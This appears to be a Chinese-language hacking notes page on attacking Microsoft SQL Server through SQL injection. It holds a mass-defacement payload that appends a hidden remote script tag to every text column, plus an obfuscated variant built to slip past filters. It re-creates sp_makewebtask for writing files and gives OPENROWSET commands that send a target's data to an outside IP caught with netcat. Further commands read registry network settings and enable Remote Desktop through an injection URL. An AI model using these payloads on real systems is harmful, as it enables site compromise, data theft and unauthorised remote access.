- rtrim(convert(varchar,['+@c+']))+cast(0x223E3C2F613E3C2F7469746C653E3C736372697074206C616E67756167653D6A617661736372697074207372633D687474703A2F2F2533352533312536462536362532452536452536352537342F696D672E6769663E3C2F7363726970743E
as varchar(80))’)
- fetch next from table_cursor into @t,@c
- end
- close table_cursor
- deallocate table_cursor
-
-
- “></a></title><script language=javascript src=http://%35%31%6F%66%2E%6E%65%74/img.gif></script>
-
- ;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe=’u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec(‘UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F613E3C2F7469746C653E3C696672616D65207372633D687474703A2F2F7777772E676F6F676C652E636F6D2077696474683D313030206865696768743D3130303E3C2F696672616D653E20%20aS%20vArChAr(80))’)%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;–
-
-
- 创建sp_makewebtask这个存储过程
-
- /********************************************************************************************/
- /* Create SP’s */
- /********************************************************************************************/
-
- –====================================================================================
- – Add extended stored procedures for Web Server support.
- –
- – sp_makewebtask: Creates and defines the Web Page Task
-
- CREATE PROCEDURE sys.sp_makewebtask
- @outputfile nvarchar(255),
- @query ntext,
- @fixedfont tinyint = 1, — 0/1
- @bold tinyint = 0, — 0/1
- @italic tinyint = 0, — 0/1
- @colheaders tinyint = 1, — 0/1
- @lastupdated tinyint = 1, — 0/1
- @HTMLheader tinyint = 1, — 1-6
- @username nvarchar(128) = NULL,
- @dbname nvarchar(128) = NULL,
- @templatefile nvarchar(255) = NULL,
- @webpagetitle nvarchar(255) = NULL,
- @resultstitle nvarchar(255) = NULL,
- @URL nvarchar(255) = NULL,
- @reftext nvarchar(255) = NULL,
- @table_urls tinyint = 0, — 0/1; 1=use table of URLs
- @url_query nvarchar(255) = NULL,
- @whentype tinyint = 1, — 1=now, 2=later, 3=every xday
- – 4=every n units of time
- @targetdate int = 0, – yyyymmdd as int
- @targettime int = 0, – hhnnss as int
- @dayflags tinyint = 1, — powers of 2 for days of week
- @numunits tinyint = 1,
- @unittype tinyint = 1, — 1=hours, 2=days, 3=weeks, 4=minutes
- @procname nvarchar(128) = NULL, – name to use when making the
- – task and the wrapper/condenser
- – stored procs
- @maketask int = 2, – 0=create unencrypted sproc, no task
- – 1=encrypted sproc and task
- – 2=unencrypted sproc and task
- @rowcnt int = 0, – max no of rows to display
- @tabborder tinyint = 1, — borders around the results table
- @singlerow tinyint = 0, — Single row per page
- @blobfmt ntext = NULL, — Formatting for text and image fields
- @nrowsperpage int = 0, – Results displayed in multiple pages of n rows per page
- @datachg ntext = NULL, — Table and column names for a trigger
- @charset nvarchar(25) = N’utf-8′, — Universal character set is the default
- @codepage int = 65001 – utf-8 (universal) code page is the default
-
- AS
- BEGIN
-
- DECLARE @suid smallint
- DECLARE @yearchar nvarchar(4)
- DECLARE @monthchar nvarchar(2)
- DECLARE @daychar nvarchar(2)
- DECLARE @hourchar nvarchar(2)
- DECLARE @minchar nvarchar(2)
- DECLARE @secchar nvarchar(2)
- DECLARE @currdate datetime
- DECLARE @retval int
-
-
- – Check for valid @dbname if supplied
- IF (@dbname is NOT NULL)
- IF (NOT(exists(SELECT * FROM master..sysdatabases WHERE name = @dbname)))
- BEGIN
- RAISERROR(16854,11,1)
- RETURN (9)
- END
-
- – Make sure that it’s the SA executing this.
- IF ( NOT ( is_srvrolemember(‘sysadmin’) = 1 ) )
- BEGIN
- RAISERROR( 15003, -1, -1, ‘sysadmin’ )
- RETURN(1)
- END
-
- – IF not supplied, determine the user executing this procedure
- IF (@username is NULL)
- BEGIN
- SET @username = suser_sname()
-
- IF ( (charindex (‘\’,@username) > 0) OR (@username is NULL) OR (@username = ‘sa’) )
- BEGIN
- SELECT @username = N’dbo’
- END
- END
-
- – If not supplied, determine the database currently active
- IF (@dbname is NULL)
- BEGIN
- SELECT @dbname = d.name FROM
- master..sysdatabases d, master..sysprocesses p
- WHERE d.dbid = p.dbid AND spid = @@spid
-
- END
-
- – Generate @procname if not supplied
- IF (@procname is NULL)
- BEGIN
-
- SET @currdate = getdate()
-
- SET @yearchar = convert(nvarchar(4),year(@currdate))
- SET @monthchar = right(’0′+ rtrim(convert(nvarchar(2),month(@currdate))),2)
- SET @daychar = right(’0′+rtrim(convert(nvarchar(2),day(@currdate))),2)
- SET @hourchar = right(’0′+rtrim(convert(nvarchar(2),datepart(hh,@currdate))),2)
- SET @minchar = right(’0′+rtrim(convert(nvarchar(2),datepart(mi,@currdate))),2)
- SET @secchar = right(’0′+rtrim(convert(nvarchar(2),datepart(ss,@currdate))),2)
-
- – Get default procname if not supplied
-
SET @procname =
N’web_’+convert(nchar(14),@yearchar+@monthchar+@daychar+@hourchar+@minchar+@secchar)+convert(nvarchar(20),@@spid)+right(rtrim(convert(
VARCHAR(25),RAND() )),4)
-
- END
-
- SET @retval = 0
-
- – Create the Web task
- EXECUTE @retval = sys.xp_makewebtask @outputfile, @query, @username, @procname, @dbname,
- @fixedfont, @bold, @italic, @colheaders, @lastupdated, @HTMLheader,
- @templatefile, @webpagetitle, @resultstitle, @URL, @reftext,
- @table_urls, @url_query, @whentype, @targetdate, @targettime,
- @dayflags, @numunits, @unittype, @rowcnt, @maketask, @tabborder,
- @singlerow, @blobfmt, @nrowsperpage, @datachg, @charset, @codepage
-
- IF (@retval <> 0)
- BEGIN
- SET @procname = ‘xp_makewebtask’
- RAISERROR(@retval, 11, 1, @procname)
- END
-
- RETURN @retval
-
- END
-
-
- 其实opendatasource是取数据用的,如果你想得到数据库的IP,根本不需要MSSQL环境就可以得到DATA的IP
-
- 用如下语句:
- insert
into
OPENROWSET(‘SQLOLEDB’,'uid=test;pwd=test;Network=DBMSSOCN;Address=219.152.120.157,555;’,
‘select * from dest_table’) select * from src_table;–
-
- 然后在本机用NC监听8787端口就可以了
-
-
- 另外,用opendatasource取数据的时候要考虑本机带宽等问题!
-
- 利用OPENROWSET这个函数也可以拿到数据 并不单单拿到data的IP
-
-
- 关于利用注射点判断数据库web是否分离2009-04-25 13:11来自:皇子
-
- xp/2003系统下注册表里有个键值可以得到真实的ip地址
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\{FBD72F8D-6334-4739-957A-7D324D9C27EF}\Parameters\Tcpip
- ,在注册表的窗口右边就可发现“IPAddress”、“DefaultGateway”、“SubnetMask”等键值,它们分别对应本机当前配置的IP地址、网关及子网掩码等信息
- 我们用opendatasource反弹出来的ip始终都是公网ip
- 即使得到的数据库ip和webip一样 也不能断定数据库web不分离
- 我可以先建立一个表,把注册表里的真实ip写进去,然后如果是个公网ip而且和反弹结果一样 则断定是数据库web不分离 如果是个内网ip 则观望状态。
- 具体代码:
- insert ku exec master..xp_instance_regenumkeys ‘HKEY_LOCAL_MACHINE’, ‘SYSTEM\ControlSet001\Services\’
- 把网卡id写进表ku 中,然后用各种手法读出来,
- exec
master..xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,
‘SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip’
- 看看tcpip项下有几个小项
-
- exec
master.dbo.xp_regread
‘HKEY_LOCAL_MACHINE’,'SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip’,'ipaddress’
-
- exec
master.dbo.xp_regread
‘HKEY_LOCAL_MACHINE’,'SYSTEM\ControlSet001\Services\{4733C3BB-EC77-4AB4-A6EA-02DB07FD7CFD}\Parameters\Tcpip’,'DefaultGateway’
- 然后读出每个属性,就知道ip网关了
-
- 但是实际操作的时候其实有很多问题,除了xp_regread,上面2个存储过程都是要求sa来调用的,这下还不如直接直接命令然后看结果来的方便简单了,不过难得研究出来了就放这吧,有点鸡肋了.
- 幸好200(sql2005_inj的作者)给予了一个方案,可以更简洁:
- select host_name();得到客户端主机名
- select @@servername;得到服务端主机名
- 暴错时 and host_name()>0–
- 不暴时配合union all select
- 或者全部opdatasource反弹回来,查看结果一样就是不分离,不一样的话就是分离
-
- 开启3389的SQL语句:
- syue.com/xiaohua.asp?id=100;exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal
Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
-
-
- 关闭3389的SQL语句:
- syue.com/xiaohua.asp?id=100;exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal
Server’,'fDenyTSConnections’,'REG_DWORD’,1;